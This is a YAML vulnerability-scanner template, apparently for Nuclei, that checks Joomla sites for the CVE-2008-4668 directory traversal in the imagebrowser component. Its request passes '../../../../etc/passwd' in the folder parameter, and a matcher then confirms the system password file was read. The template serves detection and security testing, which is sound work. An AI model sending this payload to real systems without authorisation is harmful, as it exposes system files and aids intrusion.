28 lines
800 B
YAML
28 lines
800 B
YAML
|
id: CVE-2008-4668
|
||
|
|
||
|
info:
|
||
|
name: Joomla! Component imagebrowser 0.1.5 rc2 - Directory Traversal
|
||
|
author: daffainfo
|
||
|
severity: high
|
||
|
description: Directory traversal vulnerability in the Image Browser (com_imagebrowser) 0.1.5 component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.
|
||
|
reference:
|
||
|
- https://www.exploit-db.com/exploits/6618
|
||
|
- https://www.cvedetails.com/cve/CVE-2008-4668
|
||
|
tags: cve,cve2008,joomla,lfi
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd"
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
|
||
|
- type: regex
|
||
|
regex:
|
||
|
- "root:.*:0:0"
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|